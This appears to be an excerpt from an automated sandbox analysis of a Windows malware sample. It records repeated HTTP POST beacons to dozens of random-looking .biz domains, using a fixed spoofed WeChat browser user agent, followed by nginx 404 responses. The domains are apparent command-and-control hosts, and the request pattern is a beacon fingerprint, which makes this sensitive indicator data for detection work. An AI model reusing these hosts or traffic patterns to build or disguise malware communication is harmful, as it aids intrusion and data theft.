              Source: global trafficHTTP traffic detected: POST /anxwhb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /gbpwk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: znwbniskf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /kgrhqg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /dleie HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kvbjaur.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /wmvbvpamjcuqeg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cpclnad.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ayqsgvejwqqtuhlw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uphca.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /sfpm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mjheo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ywpgeaid HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fjumtfnz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /vux HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wluwplyh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /iasdsuhvtygftfd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hlzfuyy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /kfxwsateoe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zgapiej.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /df HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rffxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ewnr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jifai.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /prir HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xnxvnn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /vfforoslwsi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cikivjto.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /bfwumbhax HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qncdaagct.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /wuqlqwd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ihcnogskt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /doxg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: shpwbsrw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /jsxjkxjpifqnuouu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kkqypycm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /niimxaprbqaffu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: shpwbsrw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /nfn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uevrpr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /monvvvssytjyx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fgajqjyhr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /xiubmulosfxjb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hagujcj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /fb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cjvgcl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ymxofohtmnuucvl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: neazudmrq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /gbk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sctmku.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /leprwccfmwjgljdl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pgfsvwx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /rbdqbpnxm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qcrsp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: aatcwo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /aumopkwtqjj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sewlqwcd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /mwaqiugfciuwk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dyjdrp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /nwtkmxcykx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kcyvxytog.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /rbaauabmruspy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /miwimxtpafcu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nwdnxrd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /suayd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nwdnxrd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /wpmohqs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qvuhsaqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /wggmqoohnhblgniy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ereplfx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /octb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: apzzls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /unku HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ptrim.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /hqtt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: krnsmlmvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /unuaesdvma HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ptrim.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /photgshiyqocqphc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nlscndwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /rbvpvahvdptnmihm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bzkysubds.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ntn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: znwbniskf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /lo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ltpqsnu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /pjj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vnvbt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /mprtttkxf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cpclnad.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /goqcyypv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ypituyqsq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mjheo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /gablvhtmh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ijnmvqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /fhni HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wluwplyh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
              Source: unknownHTTP traffic detected: POST /bvjounbjkagqnta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:28:45 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:28:45 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:28:49 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:28:49 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:28:49 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:28:49 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:28:50 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:28:53 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
